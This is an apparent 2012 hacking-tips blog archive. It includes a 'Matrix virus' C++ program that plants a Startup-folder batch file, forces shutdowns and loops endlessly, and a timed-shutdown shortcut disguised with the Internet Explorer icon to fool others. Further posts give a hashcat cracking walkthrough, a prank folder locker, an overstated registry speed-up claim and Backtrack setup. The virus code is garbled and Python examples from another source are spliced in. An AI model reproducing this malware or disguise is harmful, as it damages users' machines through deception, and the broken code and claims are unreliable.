Saturday, March 10, 2012

Matrix Virus


MAKING THE MOST DANGEROUS VIRUS, CALLED MATRIX:




Warning - Do not run it on your computer


I'm gonna teach you how to make a virus named Matrix...


1- Open notepad
2- Put in this code


#include
#include
#include
#include
#include
#include
#include
using namespace std;


int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);


{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}


{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}


START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;






3- Save it as matrix.bat
4- Finish






AS IT WAS TOO DANGEROUS, THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN.


IF YOU WANT TO TRY THIS SCRIPT, YOU CAN JUST USE HEADER FILES SUCH AS STDIN, STDLIB, CONIO, AND THE LIKE.

ShutDown Virus and its Cure


Shut Down Virus:


1. Right click on the Desktop


2. Click Shortcut.
You will get a dialogue box; write in it: shutdown -s -t 1000 -c "any comment you want", then press Next.


Note: the "1000" I wrote is the time in seconds before your computer shuts down; you can put in any number you want...


3. You will get another dialogue box; write in it: Internet Explorer and press Finish.


4. You will find the icon on your desktop. Don't open it; just right click on it and go to Properties > Change Icon > select the Internet Explorer icon, then press Apply, then OK.
Try to open it: it is a virus :D :D :D




PS: the only way to stop your computer from shutting down is to go to Start > Run and type: shutdown -a

Make your PC faster than before


Want to speed up your PC? Follow these steps:

# Go to Start, click Run and type regedit


# Expand HKEY_CURRENT_USER, then the Control Panel folder, then the Desktop folder. Do it correctly.


# You will see the registry settings on the right-hand side; select MenuShowDelay, right click it and select Modify.


# You will get the Edit String dialog. The default value data is 400; change the value data to 000.


# Restart your computer. You will notice that your computer has become much faster.

Hard Reset for NOKIA cell phones


Hard Reset for Symbian S60 3rd, 5th (Touch Screen & QWERTY)


S60 3rd Hard Reset:
1- Turn the device off
2- Press and hold “*” “3” and call Green keys
3- Turn on the device by pressing the on button
4- Wait till the Nokia logo appears


S60 5th Hard Reset(Touch Screen):
1- Turn the device off
2- Press and hold “Answer” “Reject” and Camera keys
3- Turn on the device by pressing the on button
4- Wait till the Nokia logo appears


S60 5th Hard Reset(Qwerty):
1- Turn the device off
2- Press and hold “shift” “space” and Back space keys
3- Turn on the device by pressing the on button
4- Wait till the Nokia logo appears

To Convert a FAT Partition to NTFS without Formatting


To convert a FAT partition to NTFS, perform the following steps: 


1) Open 'Command Prompt'. 


2) At the command prompt, type the following- 


CONVERT [driveletter]: /FS:NTFS


'Convert.exe' will attempt to convert the partition to NTFS.




NOTE :- Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that is to be converted before executing the convert command.

The RUN Command List


100+ Run commands list


• Accessibility Options : access.cpl
• Add Hardware : hdwwiz.cpl
• Add / Remove Programs : appwiz.cpl
• Administrative Tools : control admintools
• Automatic Updates : wuaucpl.cpl
• Bluetooth File Transfer Wizard : fsquirt
• Calculator : calc
• Certificate Manager : certmgr.msc
• Character Map : charmap
• Check Disk : chkdsk
• Clipboard Viewer : clipbrd
• Command Prompt : cmd
• Component Services (DCOM) : dcomcnfg
• Computer Management : compmgmt.msc
• DDE Shares : ddeshare
• Device Manager : devmgmt.msc
• DirectX Control Panel (if installed) : directx.cpl
• DirectX Diagnostic Utility : dxdiag
• Disk Cleanup : cleanmgr
• System Information : dxdiag
• Disk Defragmenter : dfrg.msc
• Disk Management : diskmgmt.msc
• DiskPart (partition manager) : diskpart
• Display Properties : control desktop
• Display Properties (2) : desk.cpl
• Display Properties (Appearance tab) : control color
• Dr. Watson : drwtsn32
• Driver Verifier Manager : verifier
• Event Viewer : eventvwr.msc
• File Signature Verification : sigverif
• Findfast (if present) : findfast.cpl
• Folder Options : control folders
• Fonts : control fonts
• Windows Fonts folder : fonts
• FreeCell : freecell
• Game Controllers : joy.cpl
• Group Policy (XP Pro) : gpedit.msc
• Hearts (card game) : mshearts
• IExpress (.cab file generator) : iexpress
• Indexing Service (if not disabled) : ciadv.msc
• Internet Properties : inetcpl.cpl
• IPConfig (display configuration) : ipconfig /all
• IPConfig (display the contents of the DNS cache) : ipconfig /displaydns
• IPConfig (erase the contents of the DNS cache) : ipconfig /flushdns
• IPConfig (release the IP configuration leases) : ipconfig /release
• IPConfig (renew the IP configuration leases) : ipconfig /renew
• Java Control Panel (if present) : jpicpl32.cpl
• Java Web Start (if present) : javaws
• Keyboard Properties : control keyboard
• Local Security Settings : secpol.msc
• Local Users and Groups : lusrmgr.msc
• Log off : logoff
• Microsoft Chat : winchat
• Minesweeper (game) : winmine
• Mouse Properties : control mouse
• Mouse Properties (2) : main.cpl
• Network Connections : control netconnections
• Network Connections (2) : ncpa.cpl
• Network Setup Wizard : netsetup.cpl
• Notepad : notepad
• NView Desktop Manager (if installed) : nvtuicpl.cpl
• Object Packager : packager
• ODBC Data Source Administrator : odbccp32.cpl
• On-Screen Keyboard : osk
• AC3 Filter (if installed) : ac3filter.cpl
• Password Properties (if present) : password.cpl
• Performance Monitor : perfmon.msc
• Performance Monitor (2) : perfmon
• Phone Dialing Properties : telephon.cpl
• Power Options : powercfg.cpl
• Printers and Faxes : control printers
• Private Character Editor : eudcedit
• QuickTime (if installed) : QuickTime.cpl
• Regional and Language Options : intl.cpl
• Registry Editor : regedit
• Remote Desktop Connection : mstsc
• Removable Storage : ntmsmgr.msc
• Removable Storage Operator Requests : ntmsoprq.msc
• Resultant Set of Policy (XP Pro) : rsop.msc
• Scanners and Cameras : sticpl.cpl
• Scheduled Tasks : control schedtasks
• Security Center : wscui.cpl
• Services : services.msc
• Shared Folders : fsmgmt.msc
• Shut down Windows : shutdown
• Sounds and Audio Devices : mmsys.cpl
• Spider (card game) : spider
• SQL Server Client Network Utility : cliconfg
• System Configuration Editor : sysedit
• System Configuration Utility : msconfig
• System File Checker (scan now) : sfc /scannow
• SFC (scan at next startup) : sfc /scanonce
• SFC (scan at every boot) : sfc /scanboot
• SFC (revert to default settings) : sfc /revert
• SFC (purge the file cache) : sfc /purgecache
• SFC (set the cache size to x) : sfc /cachesize=x
• System Properties : sysdm.cpl
• Task Manager : taskmgr
• Telnet client : telnet
• User Accounts : nusrmgr.cpl
• Utility Manager (Magnifier, etc.) : utilman
• Windows Firewall (XP SP2) : firewall.cpl
• Microsoft Magnifier : magnify
• Windows Management Instrumentation : wmimgmt.msc
• Account Database Protection (SysKey) : syskey
• Windows Update : wupdmgr
• Windows XP Tour (if not removed) : tourstart
• WordPad : write
• Date and Time Properties : timedate.cpl

Thursday, March 8, 2012

DriverPack Solution 11


Having trouble installing the drivers for your personal computer or laptop?

Try DriverPack Solution. DriverPack Solution is the most popular program for automated driver installation. It has a lot of new features and is optimized for all platforms (x32-x64). The program will install drivers on any computer!

The main features are as follows.
1. Fast installation of Windows drivers
        DriverPack Solution is the most popular program for automated driver installation. DriverPack Solution has more than 9,000,000 users all over the world.
2. Any driver for any computer in one program
        DriverPack Solution simplifies the process of reinstalling Windows on any computer. No more problems searching for and installing drivers. Everything is done in a couple of mouse clicks.
3. Free distribution
        DriverPack Solution is open source software and it’s distributed freely under the GNU GPL license. This means everyone can customize the program, making it even better!

Download it Here...!!!

Create and hack Secured Folders

Securing confidential data is a basic requirement for everyone. It can be done with software available on the Internet, but here I will share a method to lock folders without using any software. This trick works in Windows XP, Vista and Windows 7.

Why to Use this Method?

*. If you are afraid of getting viruses through software (this technique is completely safe).
*. If you are using someone else's PC, want to do a prank, and don't have enough time to download and install software.
*. If for some reason you are not able to install software on the PC.

How to do it?

*. Open Notepad (Start -> Run -> Notepad)
*. Copy the code below and paste it into Notepad.


cls
:End
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==cyberspirit goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End


*. The password for the above batch file is set to cyberspirit. You can change it to anything you like by editing cyberspirit in the following line:
if NOT %pass%==cyberspirit goto FAIL

*. Now save this file with a name like anyname.bat (here .bat is the extension). I am choosing cyberspirit.bat as my file name in this tutorial.
*. A .bat file is now created.
*. Double click on the .bat file; it will ask you for the password. Enter the password (for the above code it is cyberspirit).
*. You will now see a folder named Locker in the same location where you saved anyname.bat (cyberspirit.bat here).
*. Open it and fill it with the data you want to hide.
*. When you are done with the above, press Y in the .bat file window and hit Enter.
*. Now close the .bat file window; the Locker folder will hide itself.
*. To edit the Locker folder again, double click cyberspirit.bat and enter the password.
You can do this as many times as you want. :)
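What this "lock" actually does is worth seeing in code. The added Python example below (not from the post) audits a Folder Locker script of this kind: it pulls the comparison password out of the `if NOT %pass%==... goto FAIL` line, recovers both folder names from the `ren` line, and then shows that the renamed folder and its files are readable by any process that knows the name, because nothing is encrypted and the password is never used to protect the data. The batch fragment and the temporary folder contents are constructed for the example; the CLSID and the password are the ones the post uses.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample: the lines of the Folder Locker batch file that matter for
# the audit (same CLSID and password as the post).
SAMPLE_LOCKER_BAT = r"""@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto End
:UNLOCK
set/p "pass=>"
if NOT %pass%==cyberspirit goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
"""

# The password check is a plain string comparison, so the secret sits in the file.
PASSWORD_RE = re.compile(r"if\s+NOT\s+%pass%==\s*(\S+)\s+goto\s+FAIL", re.IGNORECASE)
# The "lock" step: rename the folder to a name that ends in a CLSID.
RENAME_RE = re.compile(r'^ren\s+(\S+)\s+"([^"]*\{[0-9A-Fa-f-]{36}\})"',
                       re.IGNORECASE | re.MULTILINE)
# ...and mark it hidden + system so Explorer skips it by default.
ATTRIB_RE = re.compile(r"^attrib\s+\+h\s+\+s\b", re.IGNORECASE | re.MULTILINE)


def audit_locker_script(script_text):
    """Extract what a reviewer needs from a Folder Locker style batch file."""
    findings = {"plaintext_password": None, "real_name": None,
                "alias_name": None, "hidden_only": False}
    pw = PASSWORD_RE.search(script_text)
    if pw:
        findings["plaintext_password"] = pw.group(1)
    ren = RENAME_RE.search(script_text)
    if ren:
        findings["real_name"], findings["alias_name"] = ren.group(1), ren.group(2)
    # Rename plus attribute bits and no cipher step: the data is merely hidden.
    findings["hidden_only"] = bool(ren) and bool(ATTRIB_RE.search(script_text))
    return findings


def locate_locker(parent, findings):
    """Find the folder under either of its names and list it; no password needed."""
    for name in (findings["real_name"], findings["alias_name"]):
        if name:
            candidate = Path(parent) / name
            if candidate.is_dir():
                return candidate.name, sorted(p.name for p in candidate.iterdir())
    return None, []


def demo():
    """Create a folder under its post-'lock' name (constructed) and read it back."""
    findings = audit_locker_script(SAMPLE_LOCKER_BAT)
    with tempfile.TemporaryDirectory() as tmp:
        locked = Path(tmp) / findings["alias_name"]
        locked.mkdir()
        (locked / "notes.txt").write_text("constructed sample content")
        return findings, locate_locker(tmp, findings)


if __name__ == "__main__":
    found, (name, entries) = demo()
    print(found)
    print(name, entries)
```

On Windows the hidden/system bits only affect what Explorer displays; `dir /a`, any script, or "show hidden files" reveals the folder, and the password can be read straight out of the .bat with Notepad.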

Monday, February 20, 2012

Hashcode cracking using Hashcat in Backtrack 4


Hi Break The Security (BTS) readers, this is the first Backtrack 4 hacking tutorial. Today let us look at the HashCat cracking tool (dictionary attack).

Backtrack 4 Tutorials Step 1:

Boot into Backtrack 4 Linux.
Now navigate to this path:
Backtrack -> Privilege Escalation -> Password Attack -> Offline Attacks
Open HashCat.
You will now see a terminal window at this path:

root@bt:/pentest/passwords/hashcat#

Hashcat basic options and commands




Step 2:
If you scroll to the top, you will find the help text. The standard format for running the hashcat application is



./hashcat-cli.bin [options] hashfile [wordfiles|directories]




You can see the list of options below the command format.
hashfile is the file which contains the hash (an MD5 hash, for instance).
wordfiles are the dictionary files.
The list of options is:
Startup:

-V, --version print version
-h, --help print help
--eula print eula


Logging and Files:
-r, --rules-file=FILE rules-file for hybrid-attack
-o, --output-file=FILE output-file for recovered hashes
-e, --salt-file=FILE salts-file for unsalted hashlists
--debug-file=FILE debug-file
--debug-mode=NUM 0 = save finding rule (hybrid only)
1 = save original word (hybrid only)
2 = save recovered pass
-p, --seperator-char=CHAR seperator-char for hashlists


Resources:


-n, --threads=NUM number of threads
-c, --segment-size=NUM number of mb to cache from wordfile
-s, --words-skip=NUM skip number of words (for resume)
-l, --words-limit=NUM limit number of words (for distributed)


Attacks:
-g, --generate-rules=NUM number of self-generating rules
--generate-rules-func-min=NUM force number of functions per rule min
--generate-rules-func-max=NUM force number of functions per rule max
-a, --attack-mode=NUM number of attack-mode
0 = Straight *
1 = Combination *
2 = Toggle-Case *
3 = Brute-Force
4 = Permutation
* = for Hybrid-Attack use -r or -g


-m, --hash-mode=NUM number of hash-mode


0 = MD5
1 = md5($pass.$salt)
2 = md5($salt.$pass)
3 = md5(md5($pass))
4 = md5(md5(md5($pass)))
5 = md5(md5($pass).$salt)
6 = md5(md5($salt).$pass)
7 = md5($salt.md5($pass))
8 = md5($salt.$pass.$salt)
9 = md5(md5($salt).md5($pass))
10 = md5(md5($pass).md5($salt))
11 = md5($salt.md5($salt.$pass))
12 = md5($salt.md5($pass.$salt))
30 = md5($username.0.$pass)
31 = md5(strtoupper(md5($pass)))
100 = SHA1
101 = sha1($pass.$salt)
102 = sha1($salt.$pass)
103 = sha1(sha1($pass))
104 = sha1(sha1(sha1($pass)))
105 = sha1(strtolower($username).$pass)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = MD5(Wordpress)
400 = MD5(phpBB3)
500 = MD5(Unix)
600 = SHA-1(Base64)
700 = SSHA-1(Base64)
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials
1200 = MD5(Chap)
1300 = MSSQL


Toggle-Case specific:
--toggle-min=NUM number of alphas in plain minimum
--toggle-max=NUM number of alphas in plain maximum


Brute-Force specific:
--bf-pw-min=NUM password length minimum
--bf-pw-max=NUM password length maximum
--bf-cs-buf=CHARS charset for attack


Permutation specific:
--perm-min=NUM number of chars in plain minimum
--perm-max=NUM number of chars in plain maximum

Step 3:
Copy the dictionary file and the hash file to the desktop.
I have this MD5 hash (c3ea886e7d47f5c49a7d092fadf0c03b) inside the file hash.txt.
My dictionary file is english.txt



Step 4:
Now type this command:


./hashcat-cli.bin '/root/hash.txt' '/root/english.txt'

and hit Enter; the hash will now be cracked.
NOTE:
If you are running Hashcat for the first time, you will get this message:
"EULA has changed,need to restart the hashcat".
Just close the window, open Hashcat again, then run the above command.
EULA changed: restart Hashcat

After restarting, it asks for the License Agreement

The hash will be cracked when you enter YES

Step 5:

If you could not crack the hash with the method above, proceed with this.
You can improve the cracking by using options.
Hash mode option:
Using the hash mode, we specify which type of hash we are going to crack.
How to use the hash mode option?
'-m[value]' specifies the hash mode.
Refer to the option list above for the different hash mode values.
We are going to crack an MD5 hash, right? For MD5 the value is 0.
So use this command:

./hashcat-cli.bin -m0 '/root/hash.txt' '/root/english.txt'


Enhancing with attack mode (-a[value]):
Using the attack mode, we specify what form the password candidates take. That may not be clear yet, so I will explain the attack modes with an example.
Let's take the simple key "iloveyou" from english.txt.
The values of the attack mode are:
             0 = Straight
             1 = Combination
             2 = Toggle-Case
             3 = Brute-Force
             4 = Permutation
If we use the -a0 option, the key is tried as it is: "iloveyou". For -a1 it becomes "iloveyouiloveyou". For -a2 it becomes IloveYou, ILoveyou, etc. I think you know about brute force; if you don't, please read my previous post about brute force. I hope you know about permutation.

./hashcat-cli.bin -m0 -a2 '/root/hash.txt' '/root/english.txt'
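To make the hash-mode (-m) and attack-mode (-a) options concrete, here is an added Python example; it is not part of the post and not hashcat's own code. It implements a handful of the -m formulas from the option list above and the Straight, Combination and Toggle-Case candidate generators, then runs a dictionary check against constructed targets. The wordlist, the salt value and the target hashes are constructed for the example, and hashcat's habit of reading the salt from the hash file is simplified to an explicit `salt` parameter. The point it shows: a hash that misses under one mode can hit under another, and a salted hash is never found under the unsalted mode even when the password is in the wordlist.

```python
import hashlib
import itertools


def md5(data):
    """Hex MD5 of bytes, the form hashcat compares against."""
    return hashlib.md5(data).hexdigest()


def sha1(data):
    return hashlib.sha1(data).hexdigest()


# A subset of the -m hash modes listed above, written out as the formulas
# hashcat applies. $pass and $salt are bytes; nested md5() hashes the hex text.
HASH_MODES = {
    0: lambda p, s: md5(p),                  # MD5
    1: lambda p, s: md5(p + s),              # md5($pass.$salt)
    2: lambda p, s: md5(s + p),              # md5($salt.$pass)
    3: lambda p, s: md5(md5(p).encode()),    # md5(md5($pass))
    100: lambda p, s: sha1(p),               # SHA1
    101: lambda p, s: sha1(p + s),           # sha1($pass.$salt)
}


def toggle_case_variants(word):
    """Attack mode 2: every upper/lower combination of the characters of a word."""
    for flags in itertools.product((str.lower, str.upper), repeat=len(word)):
        yield "".join(f(c) for f, c in zip(flags, word))


def candidates(words, attack_mode):
    """Yield password candidates the way the chosen -a mode expands the wordlist."""
    if attack_mode == 0:            # Straight: each word exactly as listed
        yield from words
    elif attack_mode == 1:          # Combination: every word joined to every word
        for left, right in itertools.product(words, repeat=2):
            yield left + right
    elif attack_mode == 2:          # Toggle-Case: case variants of each word
        for word in words:
            yield from toggle_case_variants(word)
    else:
        raise ValueError("attack mode %d not implemented in this example" % attack_mode)


def crack(target_hex, words, hash_mode=0, attack_mode=0, salt=b""):
    """Return the first candidate whose hash equals target_hex, or None."""
    hasher = HASH_MODES[hash_mode]
    target = target_hex.lower()
    for cand in candidates(words, attack_mode):
        if hasher(cand.encode(), salt) == target:
            return cand
    return None


# Constructed stand-in for english.txt.
WORDLIST = ["password", "iloveyou", "letmein", "qwerty"]


def demo():
    """Constructed targets: which mode finds which hash."""
    straight = md5(b"iloveyou")
    combo = md5(b"iloveyouiloveyou")
    toggled = md5(b"IloveYou")
    salted = md5(b"iloveyou" + b"s4lt")        # mode 1 with a constructed salt
    return {
        "straight": crack(straight, WORDLIST),
        "straight_misses_toggled": crack(toggled, WORDLIST),
        "combination": crack(combo, WORDLIST, attack_mode=1),
        "toggle": crack(toggled, WORDLIST, attack_mode=2),
        "salted_wrong_mode": crack(salted, WORDLIST, hash_mode=0),
        "salted_right_mode": crack(salted, WORDLIST, hash_mode=1, salt=b"s4lt"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

Toggle-Case grows as 2 to the power of the word length, which is why hashcat exposes --toggle-min and --toggle-max to bound it; the example accepts the full expansion because the constructed words are short.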

Sunday, February 19, 2012

Installing and Configuring Backtrack on ur PC

FYI : An excellent guide about Backtrack4 can be found at BackTrack 4 – The Definitive Guide

1. Installing Backtrack to a harddrive (using Ubiquity)

  • Boot from the Backtrack DVD and choose “Start Backtrack in Text Mode”
  • Backtrack will boot and will automatically end up at a root prompt.
  • Launch the GUI by running ‘startx’.
  • Open a konsole and run ‘ubiquity’.
  • At the “Language crashed” dialog, choose “Continue anyway”
  • Set timezone and choose keyboard layout.
  • Let backtrack partition the disk. (‘Use entire disk’)
  • Enter new user account information. (Pick a strong password, as this will be the user account used to log on into Backtrack)
  • Review the installation summary and press “install” to start the installation.
  • Reboot when installation has completed
  • Log in with the newly created user
  • change the password for root (sudo passwd root)
Installing VirtualBox guest additions (if you have installed BT on VirtualBox) :
  • In Virtualbox, select “Devices – Install Guest Additions”)
  • Open Konsole, mount the cdrom (“mount cdrom”) and run “sudo /media/cdrom/VBoxLinuxAdditions-x86.run”
  • reboot (“sudo reboot”)

2. Running Backtrack from USB (with support for persistent changes)

This procedure only works for Backtrack 4 Pre-final. You need a 4 GB (or bigger) USB stick to run BT4 Pre-final.
  • Boot Backtrack and insert the USB. In my test environment, I’m running BT on VirtualBox. Let’s say the USB was detected as sda (run ‘dmesg’ to see system messages after you have connected the USB) .
  • Mount the Backtrack CDRom
    • mount /dev/cdrom /media/cdrom
  • Run fdisk :
    • fdisk /dev/sda
      • Verify that there are no partitions :  ‘p’   (or use  ‘d’ to remove any existing partitions, ‘w’ to write the changes, and run fdisk again)
      • create a new partion : ‘n’
        • p   (primary)
        • Partition number 1
        • First cylinder : use default 1
        • Last cylinder : +1500M
      • create another new partition : ‘n’
        • p    (primary)
        • Partition number 2
        • First cylinder : use default value
        • Last cylinder : +1500M
      • Set first partition active and set partition type of first partition to FAT32
        • a
          • 1
        • t
          • 1
          • b
        • Look at the partition table now. There should be 2 partitions of 1.5G each
        • write the changes to disk : ‘w’
  • Format the 2 partitions :
      mkfs.vfat -F 32 -n BT4 /dev/sda1
      mkfs.ext3 -b 4096 -L casper-rw /dev/sda2
      Use the default journal size (8192 blocks)
  • Mount the USB key and copy the file structure from the CDRom to USB stick
      mkdir /mnt/sda1
      mount /dev/sda1 /mnt/sda1
      rsync -avh /media/cdrom/ /mnt/sda1/        
      (don’t forget the trailing slashes after ‘cdrom’ and after ‘sda1’ !)
  • When all files are copied (1,32Gbytes, may take a little while) , run grub-install
      grub-install --no-floppy --root-directory=/mnt/sda1 /dev/sda1
  • Edit boot menu
    vi /mnt/sda1/boot/grub/menu.lst
    Set ‘default’ to 5
    Find the entry with title “Start Persistent Live CD”. Change the title to for example “Start Persistent Live USB”.
    Edit the line below the title (“kernel” line) and add the following statement at the end of the line :
    vga=0x317
    Save the changes
  • Unmount the USB key
    cd /
    umount /mnt/sda1
  • Boot a computer from this newly created USB and verify that BT works, and that changes are written onto the USB. 

Alternatively, you can create a USB based BT from Windows by using UNetbootin (Windows).
Partition the USB drive (as explained above), run UNetbootin, select the BT4 Pre-final ISO file, select the USB drive and install.
After the installation, find syslinux.cfg in the root of the first partition on the USB. Edit the file and add the vga=0x317 parameter after “Start Persistent Live CD” (under label ubnentry4)
At the top of the file, set default to ubnentry4. Save the file and you’re all set

3. Networking and Network Services
Networking
By default, DHCP (or networking for that matter) is disabled. You need to run ‘/etc/init.d/networking start’ to start networking. If you want to load networking at boot (on a HD install or USB with persistent changes), add that command to /etc/init.d/rc.local or run “sudo /usr/sbin/update-rc.d networking defaults”
Wireless networking can be started with Knetworkmanager (run “sudo /etc/init.d/NetworkManager”)
SSH
Edit ssh config and disable root logon via ssh :
sudo vi /etc/ssh/sshd_config  and set “PermitRootLogin” to no.
If you get an error about the ssh_host_dsa_key or ssh_host_rsa_key not being found, generate the keys and try again
Starting OpenBSD Secure Shell server: sshd
Could not load host key: /etc/ssh/ssh_host_dsa_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Generate host keys :
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
Start sshd (“sudo /etc/init.d/ssh start”)
If you want to enable ssh to start at boot time, run update-rc.d ssh defaults
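As an added check that is not part of the guide, the Python example below reads an sshd_config and reports the PermitRootLogin value sshd will actually apply, following the rules sshd itself uses: '#' starts a comment, keywords are case-insensitive, either "Keyword value" or "Keyword=value" is accepted, the first occurrence of a keyword wins, and settings inside a Match block are conditional, so the scan stops there instead of reporting a conditional value as global. The sample configuration is constructed; the `default` argument stands in for the value sshd uses when the keyword is absent (it was "yes" in OpenSSH releases of this era and is "prohibit-password" in current ones).

```python
import re

# Constructed sample: the commented-out default that stock files ship with,
# followed by the explicit override the guide tells you to set, and a Match
# block whose contents must not be mistaken for the global value.
SAMPLE_SSHD_CONFIG = """\
# Authentication:
#PermitRootLogin yes
PermitRootLogin no   # set per the guide
PasswordAuthentication yes
Match User backup
    PermitRootLogin yes
"""


def effective_setting(config_text, keyword, default):
    """Return the global value sshd uses for `keyword`, or `default` if unset."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        # Keyword and argument are separated by whitespace or by a single '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break                                # conditional section: stop
        if key == keyword.lower():
            return value                         # first occurrence wins
    return default


def root_login_findings(config_text, default="yes"):
    """Summarise the root-over-SSH posture of a config; `default` is an assumption."""
    value = effective_setting(config_text, "PermitRootLogin", default)
    return {
        "PermitRootLogin": value,
        # Only "no" blocks root entirely; "prohibit-password" still allows keys.
        "root_ssh_login_disabled": value.lower() == "no",
    }


if __name__ == "__main__":
    print(root_login_findings(SAMPLE_SSHD_CONFIG))
    print(root_login_findings("#PermitRootLogin yes\n"))   # commented line: default applies
```

The commented-out line in a stock sshd_config is the usual trap: it documents the default but sets nothing, so the checker has to treat it as absent rather than as "yes".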

4. Keeping Backtrack up-to-date
Updating & Upgrading Backtrack
/usr/bin/apt-get -y update
/usr/bin/apt-get -y upgrade
To download and install all new updates, run apt-get dist-upgrade
The first time you run apt-get update, you may get an error “GPG error : http://ppa.launchpad.net intrepid Release: The following signatures couldn’t be verified because the public key…”
Quick fix :
wget http://apt.pearsoncomputing.net/public.gpg
sudo apt-key add public.gpg
rm public.gpg
(Then run the apt-get update again and it should work)
Upgrading the distro to the latest version :
apt-get update && apt-get dist-upgrade -y
Warning : an “upgrade”  in BT4Beta will also upgrade KDE to 3.5.. If KDE is not working anymore after update/upgrade  ?  (a.k.a. ‘startx’ does not seem to work) :
root@bt:~# cd /etc/alternatives/
root@bt:/etc/alternatives# mv x-session-manager x-session-manager-broken
root@bt:/etc/alternatives# ln -s /opt/kde3/bin/startkde x-session-manager
root@bt:/etc/alternatives# startx
(this issue should be fixed in the final version)

 Updating security components
/pentest/exploits/fast-track.py -i
First update fast-track, then update other individual components (Metasploit, Aircrack, nikto, etc; or choose ‘9’ to update all)
If updating nikto doesn’t work :
Updating Nikto...
cd: 1: can't cd to /pentest/scanners/nikto/
/bin/sh: ./nikto.pl: not found 
Fix :
root@bt:~# mkdir /pentest/scanners/nikto/
root@bt:~# ln -s /usr/bin/nikto /pentest/scanners/nikto/nikto.pl
root@bt:/pentest/exploits/~# ./fast-track -c 1 2

5. Change keyboard layout
dpkg-reconfigure console-setup

6. Installing Nessus
First, download the Nessus and NessusClient installation packages from the Nessus (Tenable Network Security) website : http://www.nessus.org/download/
(Choose ‘Nessus for Linux’) and download the packages for Ubuntu. Put the .deb files in /tmp
Install Nessus Daemon
root@bt4-1:/tmp# ls Nessus* -al
-rw-r--r-- 1 root root 3002846 Jul  4 15:46 Nessus-4.0.1-ubuntu810_i386.deb
-rw-r--r-- 1 root root  500624 Jul  4 15:46 NessusClient-4.0.1-ubuntu810_i386.deb
root@bt4-1:/tmp#
root@bt4-1:/tmp# dpkg --install Nessus-4.0.1-ubuntu810_i386.deb
Selecting previously deselected package nessus.
(Reading database ... 183074 files and directories currently installed.)
Unpacking nessus (from Nessus-4.0.1-ubuntu810_i386.deb) ...
Setting up nessus (4.0.1) ...
nessusd (Nessus) 4.0.1. for Linux
(C) 1998 - 2009 Tenable Network Security, Inc.

 - Please run /opt/nessus/sbin/nessus-adduser to add a user
 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain
   all the newest plugins
 - You can start nessusd by typing /etc/init.d/nessusd start

root@bt4-1:/tmp# 


Install Nessus Client
Before installing the client, you will need to install some dependencies :
root@bt4-1:/tmp# apt-get install libqt4-core libqt4-gui
      libqtcore4 libqt4-network libqt4-script libqt4-xml
      libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl
      libqt4-designer libqt4-assistant

Reading package lists... Done
Building dependency tree
Reading state information... Done
libqtcore4 is already the newest version.
libqtcore4 set to manually installed.
libqt4-network is already the newest version.
libqt4-network set to manually installed.
libqt4-script is already the newest version.
